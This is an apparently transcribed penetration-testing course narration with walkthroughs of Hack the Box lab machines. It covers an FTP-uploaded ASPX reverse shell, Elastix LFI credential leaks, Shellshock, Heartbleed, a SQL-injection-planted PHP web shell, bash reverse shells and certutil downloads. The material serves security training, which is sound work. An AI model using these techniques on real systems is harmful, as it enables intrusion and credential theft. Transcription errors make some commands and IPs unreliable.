test.txt, and then we'll just put test, and then we can save this, and then we can come over here and we can see if we can put test.txt. I actually think we need to go binary. When you put things in a FTP, when you put things through FTP, you should always transfer everything through binary. That probably worked, but it's always best practice to switch to binary because sometimes it won't work if you don't switch. So test.txt, and it worked. So we are able to put files to this server. One thing that's also helpful to know is sometimes you'll come into FTP and you won't be able to put files, but you'll be able to get, and sometimes you can just use get and then the file name, and you should be able to type that. And then if we exit out of here and we ls, we were able to get that file, because sometimes you'll need to be able to read these, and sometimes you need to be able to get them in order to read them. So now you can, if this was a text file, not an image, you would just type in gedit or nano or v or vim, and you can read these files. And sometimes get doesn't work, and you'll have to use an mget. I've only ever had that happen to me once, but it does happen. So we know we can put a file onto this server through FTP. What we can do now is we can put a file that has malicious code in it that connects back to our Kali box, and then we can have remote code execution on this server. We're going to use MSF Venom to do this, and one of the things I like to do, I think I've shown you guys this before, I go MSF Venom, and then I go cheat sheet. The one I like to use, I know it's down here a little ways. Is it this one? It is this one. I like to use this, and since we know we are running Windows, and you can actually tell by coming over here, we're running Windows. It'll guess what we're running. Our in-map scan will often guess what we're running. So we have Microsoft, and Windows. So with a Windows server, what we're going to go for is the web payload, and we're going to go ASP, and we'll copy this. We'll paste it in. We're going to modify it so that it will work for us. We're going to type in ASPX. We'll come over here and type in ASPX. and we will put the port we want in here. We're going to go with port 4444. And sometimes you're actually going to have to use an open port. I like to use port 444, but sometimes if you come across an exploit that you know should be working and it's not working, you can try an open port that's already open on your nmap scan. So like in this case, we'd use port 80 or some random port that nmap has open, and go through and try some of those. It does happen occasionally that the box you're working on won't like some random port and it just will not connect, and you will end up having to connect one that's already open. I have come across that before, so that's something to be aware of. And then we're not going to use Metasploit or a Metasploit handler. So what we're going to do is type in shell, and then it says shell reverse TCP, got the right IP address, our port, and the file. So what we'll do is we'll go ahead and hit enter, and that will build our payload for us. ls, we see it right here. So what we're going to do is we're going to FTP back into the server. We're going to type in the name we use to connect because it allows anonymous login. We're going to use binary for our transfer method. We are going to put our payload that we just developed. It says that it has transferred. One thing that you should always do is come in here and make sure that it actually did in fact transfer. And now that this is on the server, we're going to come up here and we're going to type in /shell.aspx. And before we hit enter, we need to set up a netcat listener on port 444. We'll go ahead and listen, and then we'll send this. And this is a good sign. And it says that we now have access to this box. We'll go, who am I? And it tells us we are on the server. So we'll stop this video here and we will come back to it later for the privilege escalation. Okay, we're going to be doing beep from Hack the Box. I've went ahead and connected the VPN and launched the box. I've also ran the nmap scan. I actually ran it twice because it was taking so long. This is how I usually run an nmap scan, but it was going so slow. I went ahead and sped it up with a T4. I think nmap by default runs at a T3. Very rarely will I ever use a T5, only if I'm in a really impatient and I just want some ports to go look at, because T5 will actually miss some ports. So if you do run a T5, I always recommend going back and running a slower version. So we have a few ports here that we should go ahead and look at. Always port 80 right off the bat. And so I actually went ahead and already typed in the IP, and it forwarded us to the port 443. So we're at HTTPS, which is open right here. And so a couple of things that we should do is come here, and one of the first things I always do is look at this. It's running with elastics, so we're going to Google that. But in the meantime, you should also go ahead and run a GoBuster, but GoBuster actually doesn't work on this box, and neither does Derb, and neither does Fuff. So you actually have to, or Derb doesn't run. You have to run a Derbuster. So we go ahead, launch Derbuster. We can type in, we have our example right here. So we type in HTTP. So that way we have some kind of recon running in the background. Put in our IP address, port 80, and then we'll speed it up. We can come in here. We need a word list, and word lists are stored user, share, all the way to the end, back one click, word list, Derbuster, and then we'll go medium. We don't want recursive, and we can start that. And while that is running, we can go ahead and Google Elastics. I went ahead and Googled the default credentials because this is something you should always try. I would say probably 20% of the time, and I actually tried a couple. When you actually come in here, I would say 20% of the time, default credentials are actually going to end up working. You're going to be able to log in with admin, or whatever the default credentials are that you find on Google. Even in job interview boxes or actual certification situations, default credentials are probably going to work
20% of the time. So it's always worth trying. So in this case, default credentials do not work. So what we'll do is come back over here. You can also run searchsploit, or you can go and check out exploit DB. In our case, we're going to run searchsploit elastics, and we can see cross-site scripting, not helpful, not helpful, not helpful. We're going to go ahead and check this one out. This one could be helpful, and this one actually could be helpful as well. We're going to do this box 2 different ways, but first we're going to start right here with this one. There's a couple different ways to copy an exploit to a current working directory. I'm not sure if I actually copied this already or not. I have not. And so one way is to go searchsploit and then type in -m, and since I have copied it in the past here, it popped up. So you can hit enter, and now if you run ls, there is the exploit right there. So we'll go ahead and read it to see what it says. And we have a local file inclusion, and this is the location. So we can go ahead and copy this. I'm gonna run it just through the browser. No point in running this and seeing what comes back. So we can just copy this, come over here, paste it in, and run it, and you get this mumbo jumbo mess. We see the file is part of FreePBX, but I like to view this a little prettier. So if you go view page source, sometimes this works with JavaScript files as well. You can go view page source and it'll look a lot better. So one of the things I see is FreePBX, and then you come down and keep reading. We see possible user, but then you come down here and it actually tells you you have a DB username, another one, a password, another password, and another user, and it looks like more passwords. So this is a great place to go ahead and start looking at these. There's a couple different ways to run these. We're going to do this manually, and we're going to go ahead and try and SSH into the box using these usernames and passwords. So I'm actually going to shoot for the ones that I know will work, because I think, if I'm remembering right, this box will actually lock you out if you try too many false passwords. So I actually already ran this a little while ago when I was doing the box, and I hit this message, and I wanted you guys to be able to see this. I had never seen this before. So when I ran this SSH, I kept on getting this error. And one of the things you need to get used to doing, and if you're a programmer, you already know this, you copy and you go to Google and you paste, and then you click and then you read to see why you're coming up with this error and what the problem is. I actually didn't see my answer in that one, so I came down to the very next one. I keep going, I read, I was reading, and eventually I found a link. Let's see, I don't remember where I found the link, but I did find the link. And when I did find the link, it said to use this, because a newer version of SSH has come out and this box is running an old version. In order to get it to work, you need to run this little flag here in order to get this to work. So if you go ahead and just SSH like you normally would, it is not going to work. So we're going to go ahead and paste this in. We're going to run it. And if this is your first time running SSH on any box, it's going to ask you, are you sure you want to continue? And you're going to type in yes, and then it asks for the password. And this is where our passwords over here come in handy. So it's this one. We'll go ahead and copy. We'll go ahead and paste and hit enter, ID, and we are root. And so that's one way to do this box. There is another way, and we'll go ahead and look at that now. We'll go ahead and exit. We'll go back to our in-map scan. And this is actually an older exploit, but it does come up from now to now, usually from now and again. Usually it only comes up in CTFs. I haven't seen it anywhere other than a CTF, so it's helpful to know, but it's I haven't found it anywhere outside of a CTF. Let's see, where did our Durbuster go? So when you see the CGI bin, this is something to always think, okay, I should look for this, is shell shock. And so when we come in here, we can see we can try this shell shock on port 80, which actually just forwards us to port 443. I've actually tried it on 443 and it doesn't work. And then we also have another web server right here on port 10,000. I have not hooked up burp to this box, so I'm going to go ahead and do that now, and I'll cut the video and we'll come back and we'll go check out port 10,000. Okay, now that I have burp hooked up, we're back here. We're looking at this port 10,000. You can copy it and come up here and put in port 10,000. And I actually think that might have to be HTTP. I can't remember. Let's look and see what it was. Yep, HTTP. It says this web server is running in SSL mode, and it says try here instead, advance, continue, and we're brought to this page. Now, if you remember, we saw that the server is running the CGI. Where are you? It's running right here. It's running the CGI bin. So what we'll do is go ahead and turn intercept on, refresh this page, send it to repeater. And one of the things that I have done is, rather than memorize what shell shock looks like, I have actually saved it over in my notes. And we'll come over to, we can actually send that on its way, come over to repeater, and we can copy this. We don't need that. And I'll paste in, this is the shell shock code. It just kind of makes the server freak out, and then it runs what is put in after it. So my IP is 1415. And so I'll go ahead and set up a netcat listener. And we'll go netcat-lv np 4444. And now it's listening. And when we send this, we should get a response over here. And we do. So that's shell shock. That's a second way to go ahead and do this box. You will see this again in the future. So I decided to append this video just a little bit. I thought maybe you guys would see all of these ports and wonder why I didn't talk about them. So some of these ports we're going to talk about later. We're definitely going to talk about port 25. We'll talk about these. We might talk about 143 as well. And then a lot of these other ports are not really common ports. So like these are not common ports. MySQL, this is common port, and we're actually going to do some MySQL enumeration later, so I didn't want to overwhelm with trying to enumerate ports and adding information that wasn't really relevant to the box. But one of the things that I would also recommend doing, like if this is your first time coming into an assessment, is to come in here, and one of the things you're going to do is you're going to copy these and you're going to paste them in Google, and you're going to read. You're probably going to copy to see what this is. You can actually just go out and Google and see, what is this port? Is this a common port? And just check those types of things out. And always trying to log into MySQL is helpful. It actually says you have MySQL unauthorized. And so these are things that are helpful to log into to see what's there. Port 22
this is our SSH port, which we did use. It's really, I very rarely, only if I hit a dead end, will I copy this and paste it, the version, and look to see if there's any exploits. SSH is usually locked up tight and it's really hard to get in. There's not a whole lot you can do with port 25 other than enumeration. Same with these, you just get a lot of enumeration, maybe some usernames. And then, so you can, I usually will come back to these types of ports if I hit dead ends and I just need more information. And there are some boxes out there where they're going to make you enumerate those ports just to test your enumeration skills. So with that, that's kind of why we didn't cover these ports and why we just kind of skipped through to the main ports, port 80, port 443, and look at the web pages first, which if there's a web page, I always recommend going and checking those out first because they're the ones with the most attack points. And yeah, so with that, I'll see you in the next video. All right, we are going to be doing MARI from Hack the Box, and I've gone ahead and ran the nmap scan already. So the IP address is right here, 10.10.10.48. And so we have quite a few ports here to be looking at. Not a ton, but a few. So we have SSH, which is always nice if we somehow find credentials, and port 53 as well, and port 80. I want to go ahead, and we also have 32400 here, which is running a web server. I want to go ahead and challenge you. We have learned everything necessary to get an initial foothold on this box, and so I want to go ahead and challenge you to do your enumeration and see if you can figure out how to get the initial foothold. I think you can do it, so you can go ahead, pause the video, and give that a try now, or you can go ahead and follow along. So here we go. We're going to go ahead and we're going to look at port 80. So our address is 10.10.10.48, and we have a blank page. We view page source, and there is nothing there. So what we're going to do is we'll go ahead and come over here, and because it's quick, we'll type in 10.10. Whoa. Type in 10.10.10.48, and I always forget that we have to http // and we're going to go ahead and let that run and see if it comes back with anything for us. And in the meantime, and look at this other port here. So this port right here, we can come over here and we can go 10.10.10.48 semicolon, and it was 32,400, I believe. And we have a login page. So if you remember, what do? We go to look and see if we can find this Plex and see if there's any default credentials. So we could come over here and we could go Plex default creds, and we can see what's here. But also in the meantime, I forgot to mention our derb scan would find this, but you could come over here and type in robots.txt. It has found an admin page. So rather than lead us down this rabbit trail here, we'll go ahead and come back over to this page, to port 80, and we'll type in admin, and we'll see what this brings back for us. Okay, and it finally loaded our page here, and it says we are on Pi-hole. And if you remember, we always go for versions. So we see this version here. We'll go ahead and click login, and we'll take this version. We'll actually just go Pi-hole, and we'll just look this up just right here. And we can copy this. First thing we do is go default credentials, and then the second thing we'll do is we'll go ahead and see if there's any exploits for this. So one of the things that you can do right here is you can just look at this by adding user. We can look, it says admin can log in with default credentials. We'll go ahead and just open up the Reddit and see what's on here. And then we'll just click our way down. And it says that we can go through and try and read that, or we can go ahead. What does this one say? It says we have the username piehole. How do we find the password? That's a video. How do we log into piehole? And it tells us, so we're going to scroll down a little ways and we're going to click through, and here it says log in with the default username pi and the default username password, or the default password raspberry. So go ahead and come over to our box. We'll just let that run, and you can actually come over here and log in with this, and we'll see if it works. And it doesn't work, but we also saw that port 22 is open, and we'll try to SSH, and you can try and SSH to the default username, which was pi at 10.10.10.48. We want to fingerprint the box, and then we'll type in the default password, and we are on the box. All right, now that you are on the box, one of the first things we should always check is for sudo -l. This will tell us what privileges we have or what files we can run as sudo or as root, and it says that we can run all of them. So you can actually just go sudo su and you can switch straight to the root user. It's a very simple privilege escalation. It's not super common, but you will see it in the future, especially in CTFs. And with that, we'll see you in the next video. Okay, we have gone ahead and launched Hack the Box. We're going to start Valentine, so you can go ahead and connect your VPN, and then you can go ahead and launch the box Valentine. And when you're ready, you can come over here and type in ping 10.10.10.79. Make sure you're connected, and go ahead and close out of that. And then we can go ahead and get started with our nmap scan. That's usually where we start off. So you can go ahead and type in nmap, and we're going to not run that script. We're going to go p-p for all ports, and then -a, and then I like to run it with a -v so I can see the output as it runs like this. And it's going to go ahead and run, and I believe these are all the ports that come up. I've already ran this, so we can go ahead and give this a look. And we have port 22, port 80, and port 443. This is actually the vuln scan that I ran, so we'll go ahead and I'll show you what that looks like. So we'll go ahead and run it like this. We'll go nmap dash, and it should pop up, dash script. It did not pop up. Vuln 10.10.10.79. And when you run that, it takes a little bit to run. And so I'll go ahead and let it run, and we'll see if it pops up by the time we are ready to look over it. So we have port 80 and we have port 443. So what we can do is come up here and just go ahead and look at the web page. We'll go ahead and look at the source to see if there's anything in there. There is not. You guys are pretty familiar at this point with how to look at web pages. So we'll go HTTPS and see if there's anything different. Go ahead and advance, accept the risk, and continue. And it's the same, and you can go ahead and do like your basic robots.txt. One of the things I like to do is go index.php, and that will tell me if there's if I need to run my GoBuster with a .php extension. A couple of things I like to do when I run my scans, I like to run a GoBuster,
and that looks okay. We'll go ahead and just use this one that's up, and we'll run a 10, 10, 10, 79. And when you run a GoBuster, because it had that index.php, we'll need to run the extension PHP and see what it pulls up. And then I also like to run fuff because it runs way faster. And we can go ahead and run 10.10.10.79. And when we go to the word list, just in case you haven't run this before and you don't have it saved, the way to get there, the word list I like to use, I believe it is in user share word list, derb, and then we'll go ahead and run that. And then you can run common.txt or big, and then the other one that's popular is dirbuster, and then the medium, so this one right here. This is how you get your word list, and yours will probably be in the same place. Why does that say we have a problem? Oh, we forgot to put our place to fuzz, so we'll go ahead and fuzz right there, and you can see just how quick this is running. So we have dev, index, let's see if let me close that one. PHP one is found the same, dev, index, index.php. So we'll check back on this later, but for now the nmap quit running, and since we ran our vuln scan along with our nmap, we can go ahead and look and see what it has come back with. So one of the things in your methodology is to, when you run an nmap scan, if I ever see port 53, 135, 139, 145, I run this scan right here. We'll see this later in the course, but it's not up. None of these ports are open, so I didn't run it. I like to run this. Sometimes you will come back with vulnerabilities. Not too often are you going to see it on like a difficult capture the flag or even a job interview box, but you might. I have actually seen this. It took about 5 minutes, and I was able to get code execution on a box for a certification through just running this. It didn't take long at all, and so sometimes it's helpful to run. And there's the vuln scans with nmap, but if you're running it on a difficult box, it's not going to pull anything back. You can also run Nikto, which we'll cover later as well. Sometimes it comes back with stuff and sometimes it doesn't. Anyway, onward, we see that it's vulnerable here to this, and then Heartbleed is vulnerable, and SSL Poodle. So when you see Heartbleed, and given that we are looking at this bleeding heart, that's where we're going to go ahead and attack. So with Heartbleed, the way it works, and I actually think there's a guy who explains it on this website here, and we'll see if if it's still up. Yes, so this is how Heartbleed works. So when you send a request to the server, you'll send the request like this. You want to see how many letters does potato have. It'll give you the response, and you can go how many is in bird, gives you the response. But the way it works is if you say I want the word hat with 500 letters, it will send you the word hat with everything after it. This is where you're going to try and exploit Heartbleed, is you're going to try and find some kind of credentials or sensitive information. So we're going to send a request to the server saying we want something 3 to 5 letters, whatever it may be, in the exploit, and then ask it to return everything for 500 letters or 1,000 characters afterward, and it's going to send us back that information and see what we can find.
we'll go ahead and you can go to Heartbleed and then GitHub, and there is a GitHub page that should have this, yeah, right here. So one of the things when I go to GitHub, I think I've mentioned this before and I will probably mention it again. When I go to a GitHub page, one of the first things I look at is how many stars, how many forks, and then I like to read the comments because I want to see quickly, is there anything, is this exploit going to do anything fishy on my virtual machine? And I've already ran this and it doesn't. One of the other things, if you are a programmer, you can go through and read the code and make sure it's not going to do anything fishy. I've already looked it over. Like I said, I've already ran it, so I know this is the one we need. And you can actually copy this to your virtual machine a couple different ways. You can come up here and you can go to the raw and you can highlight it all. You can copy it. You can make your own file. This is how I usually go about it. And then we'll call it heart.py. I paste it in here, I save it, and I'm done. And that's how I go about it. You can also come up here. I think you can copy link location and run a wget on this. And then it will also grab right here, the exact same thing. So a couple different ways you can get it. Usually, sometimes exploits will have like super long names that I don't want to retype, and so I just go to raw, I copy it, and I'll just name it like exploit.py, in this case heart.py, and save it. And now the way we go about running this, we'll go ahead and actually open it back up. Gedit heart.py. And so actually at the end of the exploit code is where it's going to run. I thought it was at the end. It's right here. So right here's where we're going to make the request and it's going to send, this is the length we need, and then this is the payload length. And I think this hex right here is 4,000 characters. Just run it this way. There we go. Now we have our, it's a dash help. We can go ahead and look and it'll tell us how far the hex dump is going to go. And there's what it's going to look like. So it is 4,000 characters. So it's that far. All the way back to the top. Okay, so when we run this, we're going to go ahead and run it as Python -n100, and if you remember from up here, it actually tells us if we want to run this a number of times in a loop instead of writing our own for loop to run this over and over. And then we can go ahead and run it, and it's going to run, and then it will give us our output. And while that runs, we can see here's what FUF has brought back, and you can see how much faster it is than GoBuster. And GoBuster has brought back these. This one is one that looks interesting. So does Decode Dev, would always be super interesting to go look at, but it actually has a, looks like the page is forwarding to another page. So we can come back here and look to see what we have. Okay, that did not bring back anything interesting. So go ahead and check dev. We have notes, and there's nothing interesting there. And then we can go to hype key, and this looks like it is encrypted with hex. And if you look at these, I think that is a line break for ASCII. So if I come across this and I didn't know what it was, a lot of penetration testing is literally trial and error and reading a ton on GitHub. And so it's just the nature of the beast. You're just going to have to read, and you're just going to have to experiment.
I've actually already done this box, and so I know what we're gonna do here. But you'll get used to seeing like what is this and why am I seeing that at the beginning, and you'll just know this is gonna be hex to ASCII, and then you can just go ahead and run those. So you can actually come up here and go hex to ASCII. A lot of times I'll use a burp decoder. The problem is it doesn't have that option. So you can paste this in here and you can run convert, and this looks like an SSH key. So go ahead and copy it. And this is finished running. We'll go ahead and save this as gedit. What did it have it saved as? Hype key. So we'll go hype.key. We'll go ahead and paste that in. And before we forget, we'll need to change the mode on it. So hype key, so that way we can run it when we try to SSH. So if we were SSHing here, we'd go SSH hype at, and then the IP address 79. I forgot to add the -I, which means we're going to use a key, and we're going to use hype key. And if this is the first time you've ran this, you're probably going to get asked, do you want to fingerprint the box? And you will say yes. And it's loading. And it's asking for a passphrase, which we don't have. And so if you hit enter, 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 it doesn't work. But when we ran our Heartbleed and we got all this information here, this is a double equals, and typically when something ends with a double equals, it's a base 64, which I actually think I have this pasted in over here. Yeah. So we have this base 64. You can come over here, go decode base 64. It might be on hex. You can go ahead and click onto text, and then your code you need to remember is Heartbleed. One of the things I always do is I have a notes. I'll go like this, and I'll copy this, and I will paste it, and then I have the encoded and then the actual password. Save it, so that way I have it for future references. And we're not going to do privilege escalation on this box right away. We're actually going to do that later in the course, so you're going to want to go ahead and save those. Now we'll go ahead and try to SSH again, and then we're going to feed it in this password whenever it finishes loading. And it says we're in. So we are on the box. And here we are. We're going to come back here for privilege escalation later. And we went through this really quickly, and I get that. But I think it's helpful just to see, as we walk through a few of these boxes, just to see how they're done and what you're looking for. You're going to get used to enumeration. You're going to get used to looking for different things. But right now, being new, it's going to take a little while. It's going to be a little bit of a struggle. But the thing about this field is you just have to keep going. You just have to keep going, and things will eventually, in a few months, you're going to know what to do, you're going to know what you're looking for, you're going to know what you're looking at. So this first box, we're going to come back to it and do this privilege escalation later, and we went through that really fast. And a couple of other things that I would just do in the enumeration that we actually skipped now that we've gone ahead and finished it. We'll go ahead and look for our, let's exit this. We'll look at the nmap scan. One of the things I would have done is I would have come in here and I would have looked for like this right here, Apache 2.2.2. Copy this, go look at exploit.db, go out and look and see if there's anything on GitHub, and I would have looked for these versions, because one of the things you're going to find when you are going through the certification process is almost everything you're going to come across is going to have
some kind of version. You're going to look at it and you're going to have to cobble together a bunch of different stuff from GitHub pages, ExploitDB, random medium web pages. Like, you're going to just have to cobble together code. Very rarely are you ever going to go, oh, here's an exploit for this, and you're going to go to search exploit and you're just going to search for a specific vulnerability and it's going to work. You're almost always going to have to change the exploit somehow. And so it's one of those things to be looking out for as you're going to be going through here. And hopefully as we go through here, you're going to see some of this, and I'll try and give you guys some more tips on what to do and what to be looking for, not just simply walking you straight through the box like I did on this one. I wanted to make this one rather quick so you can kind of see how we're going to go through these, and they might get longer the more we go through this course so that you can see exactly the methodology. I'll take us down some rabbit trails that lead to nowhere, but it's helpful for you to be able to see, okay, here's the enumeration process. At what point do I give up and say, okay, this is a rabbit hole, there's nothing here, and move on. So with that, if you have any questions, let me know, and maybe I'll append this video or remake it and try and answer the questions or anything that wasn't clear. I'll see you in the next video.
Okay, a little update video here. About halfway through this course, I decided to switch from an old 2021 box to a new 2022 box from Kali Linux. And one of the things I noticed when going back and editing the videos is that when we do file transfers, if you're on an older box from like the end of 2021, really at the switch of 2022, then this is how you'll set up a simple server, and you'll see me do this for a little while throughout the network portion of this course. But then I switched to a new Kali Linux box, which runs Python 3 by default, and the older ones in 2021 ran Python 2 by default. And so I had to specify right here this Python 2 when I would run this simple server. And we'll need to use the simple servers to transfer files back and forth between Linux machines. So you're going to be seeing this. And if you're having any trouble running one of these commands, just try running sudo python and then the simple server. And if that doesn't work, then you can try Python 2. And you can always specify if you need to. You can also go sudo python 3 to specify Python 3. So with that, this is how we're going to be transferring files. If you're having trouble with one, just try the other and it should work. Okay, we are going to be going through the box validation. This is kind of a challenging box, but I decided to put it on early in the course because we had gone through SQL injection previously, and we have talked about and seen a little bit of blind SQL injection, and this box is all about blind SQL injection. So if you want, you can go ahead and try and give it a shot without going through this walkthrough. And one thing I also want to add is when you're new and we're going through these walkthroughs and you're like, man, I never would have thought of that. I never would have thought of that. I never would have saw that. Just know I had those exact same thoughts. I had all those exact same feelings. And I probably went through 50 to 60 walkthroughs. I would read them. I would go and do the box. And then I would wait 5 or 6 days and I would try and go and do it again without any walkthrough and without any help. And so I encourage you to do those same types of things. It will be really helpful and beneficial for you to actually go through a walkthrough and then go and do the box again later on your own without the walkthrough and without any help. Because it kind of helps you start thinking about these things. Like the things I'm about to show you, like, are things I would have never known had I not seen something like it before or seen the exact same thing previously in a different box or a different CTF. So it is one of those things where just watching and going through with these walkthroughs, I have to tell you, take notes, take notes, take notes. Every script that you see, put it in your notes somewhere that you can find it, because a lot of the enumeration scripts I have are saved and I will copy, paste, and change the IP. I have a methodology written out, and you're going to have to write out your own methodology on how you go through and enumerate, and all of this comes with time. I would say within
6 months to a year, you'll have a good methodology. You'll know kind of what you're looking at and where to go. So with that, don't feel too overwhelmed as we continue to go through these. So we're going to go ahead, run nmap. I've already ran it. It actually went pretty quick. And we have port 22. I've told you I don't usually look at that. Port 80 is often the first place I go. This site is forbidden, and you have Nginx. You don't even have a version. You might be able to try and enumerate this with burp, the version, but it's probably going to be not useful. We have 8080 open, says bad gateway, and then a lot of this I wouldn't mess with unless I hit any dead ends. So we'll go ahead and we'll check out this port 80. So we'll just come up here. 1010, this is not a 101010, 1010.116, and it says join the UHC September qualifiers. So one of the first things to do is just to see what happens with this. So you enter a name, it says the player's name in Brazil, and then it lists it. So if we go back, do the same thing, we get another name. So the next thing to do is to come into burp and turn on your interceptor. Go ahead and actually what we'll have to do is turn this off. We'll go back and we'll go ahead and put in name 2. Now we'll turn on our interceptor, hit join now, send this over to repeater right here. We'll go ahead and turn that off, come over here, send it, see what our response looks like. One of the things to look at is the Apache version. I'm pretty sure there's not going to be anything there. We can look and see what is in this post request. And one of the things I think we've covered earlier in this class is just coming through and throwing in these just like this and see if anything happens. And nothing, we're not getting an internal server error. So our first thought is, well, maybe there's not a SQL injection, but there actually is. And I ran SQL map against this, and it didn't find anything. So this is one of those things that you're going to have to do manually. So we have this cookie here, and every time we send this, we get the same cookie. But if you are messing with your inputs and you change this and you send it, we get a different cookie. And really it just says user and then this. So the username is what we change over here, is determining what our cookie is. So every time we do something like this, we're going to have to change the cookie. Now this part of this box took me really quite a while to figure out, more time than I care to admit. So you come over here, you send it, we have this cookie, you can copy it and you can inspect the page. We'll make this a little taller. And we go over to storage or memory storage. And here's where we can change our cookie and we can enter this, we can refresh it, and we have an error. So this is where we see the error from the SQL injection from our little quote that we put right here. So here's the error message, and take note of where this is at. This is var www html, and then we have the web page right here, the account.php, which is right here. We're going to need to know that for later on. So now, if you remember how to do SQL injections, the next thing we need to do is union select one -- and we'll have to change this username. So we're going to check for columns to see how many columns are in this table. And the sad thing is we have to do it manually, enter, refresh, and we have an error right there. We're going to have to come over here, select one, name 6. So we got to change it again so that way we get a different cookie. Come over here, paste it in. For some reason, I think that was the same. Did that send? We'll go ahead and do 7 because I'm not really sure.
Now I know for sure that's a different cookie. Come over here, paste it in, enter, refresh, and we do not have an error, which means that it went through, which means what we sent through was true. Our statement of union select one column is true. You can try for a second, change the name, 8, send, copy. You can actually just press Command C and copy that. Enter, refresh, and we get an error because there are not 2 columns. We have hit a false statement. So the next thing we can do is we can try and put our own file in here. I actually just thought of a new way that I haven't tried to do this, but we're going to go with the way that I know works. So we're going to put a web shell in here, and web shells are something we haven't seen. So we can just come in here and type in web shell and see what happens. We'll just type in web shell. We might have to type in web shell, PHP web shell. And this is kind of one of my go-tos. So we'll click on this and we have some web shells. So what we're going to do is we're going to use this. Where is it? We're going to use this SQL injection to put our own really small web shell, or this short little code right here, into or onto the server, and then we're going to call this, and we'll have a basically command injection through this web shell. So we'll have access. So what we're going to do is come back to burp, and we're going to delete this. And so we're going to actually need our union select statement here and type this out. So we're going to I'm going to paste it rather than type it. So we'll come here, we will copy the web shell that we need. And you're going to see how these web shells work. And web shells are something that you're going to see a lot. I don't use them that often unless I absolutely have to. I usually would rather just put a file and then execute the file somehow rather than do a web shell. A lot of people will do web shells just to see if they can somehow execute code on the server through a web shell, and then they'll put a file. I usually go straight for the kill rather than waste time doing a web shell. I know people out there would say, well, how do you know you don't have an error with your file you're putting? And a web shell is the best way to go. But I don't usually do web shells unless I have to. And trust me, you're going to need to bookmark this page as web shells, and you're going to want to come back here because it's something that you're going to come across again. So you're going to come in here, paste the web shell, so that way we don't have no typos. Then in order to put this onto the server, we have to type into out file. And then if you remember the error that we had right here, this is where we're going to put the file. So that way when we go here to the extension, we have access to our web shell. So you can go ahead. Actually, I'm just going to hit Command P or Command V to paste that. And then we're going to name it. We can just name it shell.php. I usually name them shell, shelly, or something like that. We got to close our quote, dash, dash, dash. Now let me look at this. It looks okay. We're going to go ahead and change our name to name 9. It's just got 2 spaces. Nope. We're going to send it, and we will see what happens. So we'll come in here. Okay, I ended up having to revert the box. I'm not really sure what happened because this is the same PHP script that we ended with when I took that second to try and debug what was happening. I ended up having to revert the box, and it ended up working. So once you end up sending this through, it'll put this PHP script into this location, into this file, in this location on the server. So what you end up doing is coming up here, you type in shell.php, and then the cmd equals ID, and that will tell us, like we can do a who am I, and it says we are www data.
So now that we have this web shell up and working, we can go ahead and try and get a reverse shell on our Kali box here. So we have this, we can type which Python. I usually try Python shells first and nothing comes back. So what we'll do is come over to Google, type in one line reverse shell, and we'll see Pentest Monkey is usually a good one to go to. You can try bash. The first time I did this, I tried bash over and over and over again, and I could never get it to work. Then I went to PHP and I couldn't get it to work, and I reverted the box then too, and then I ended up getting the bash to work. So what we'll do is we'll just kind of play this and see how it ends up going. You can paste in your reverse shell just like this, and then we need to actually right here type in bash -c, which means we are going to execute the code that comes afterward. And then we'll just use port 4444, and then our IP minus 10 10 14 15, and that looks good. So we'll come over here, we'll open up a netcat dash lvnp 4444 and cross our fingers, hope it works. And it does not come through. So what we can do is we can intercept this. Go ahead, intercept it. We can send to repeater, so that way we have somewhere to put it. And we'll go ahead and paste this in. Control U is how I URL encode, in case I forgot to mention that. And it's hanging. And we got a shell. See, I'm not real sure why it decided to work there, and it wasn't working in other places. Now, I wasn't planning on doing any privilege escalation, but because it's right here, if you type in ls, anytime you see config.php, look in it, because I would say 90% of the time, maybe more, if you ever find on a Linux machine config.php, you are going to find a username and a password. So one of the things I actually will do when I am on a Linux box is look for config.php, and the fact that it is just sitting here as soon as we come into the box, you can just type in cat config.php and you have a username and a password. So I actually tried this previously. See, if you look at our ID, we do not have root privileges. I tried to switch users to UHC and then use that password, and it didn't work. But if you just type in switch users and then paste in the password, and then you ls, we're in, and you type in ID, and you are root. So that's a really easy win on this box. If you ever see config PHP, just remember to go ahead and look in it, because a lot of times there are going to be passwords in there. Also, on this box, if you get stuck like I did here, and also right here, I would just say revert the box. I had to revert this box at least 5 or 6 times, and I'm not really sure why when I originally had done this machine. And just even here, I had to revert it in order to get it to work. And it's kind of finicky also when you're trying to get this reverse shell. I'm not real sure why it worked here, why it didn't work here, because when you press enter here, usually the URL will automatically URL encode on its own. So you can have spaces and weird characters and it'll take care of it itself. But for some reason, it had to be done here. Also, some people like to switch it to a post request. I could not get it to run from here, and I had to leave it just like this in a GET request the first time I did this box. I spent, I bet, 30 minutes messing with this as a post request, and I could not get it to run. So sometimes persistence and a little bit of luck, and you can get into these boxes. So this is a web shell. You're going to see these again Be prepared for them. You're going to see them in certifications. You're going to see them job interviews. You're going to see them in CTFs. You're probably, just need to get used to seeing these and be thinking web shell. Whenever you are able to put a file, you can think web shell for me is always second, but it's always there if I need it. So with that, we'll continue and we'll see you in the next video. Or a machine running here. And one way to get files that I forgot to mention earlier, so this is a new video, is the URL cache with the certutil. So I've actually gone ahead and made a test file, and I'm hosting it up with a Python server in this directory so that we can go ahead and grab that. And the way this syntax works is certutil -split -f -URL cache. So this -split, being totally transparent, I'm not really sure why, but sometimes it will not run without this. And this is a -f for, I'm assuming that's file. And then the URL cache, it's going to go out to the URL we get it, and it's going to save the file that we feed to it. So we go http://10101415/test.txt. And so this should run out to our server that we have, and I think it's actually going to take a second, and it will grab the file. It says, I didn't spell it right. I forgot the dot, or I messed it up. So we'll go ahead and highlight this so I don't have to retype it, and go .txt, and now it should run. It'll come out here. We should get a 200, and then the machine should have the file here, so we can go dir, and we have the test.txt. And if we type it, we type test.txt, it says this is a test. And if you come back to our file over here and we cat test.txt, it has the same information. So it successfully grabbed the file. This is one that is going to be really useful. We're going to use this quite often. I use this whenever I cannot get PowerShell to grab a file or execute a file that I'm just using the PowerShell-C with the download string, because sometimes that doesn't work, and sometimes I actually need to get the exploit onto the machine, and this is how I do it. And I'll see you in the next lesson. Okay, we're going to go ahead and cover evil WinRM. And so this is downloaded through the Kali repository, so you can go sudo apt install evil WinRM. And if this doesn't work, or it says that it's you get an error, you can go ahead and go sudo apt upgrade and then rerun sudo apt install evil WinRM, and it should go ahead and install for you. It'll ask, do you want to install? You'll type in yes, and this can take a while to download depending on your internet speed. So we'll go ahead and run that, and the syntax to run evil WinRM is right here. So it'll be evil WinRM, the user, and your username. The P stands for password, and this will change to the password of whatever you have, and then the IP address that you're attacking. So if you ever find a username and credentials, this is a good way to go. And evil WinRM uses port 5985 and 5986. So if you ever see those ports 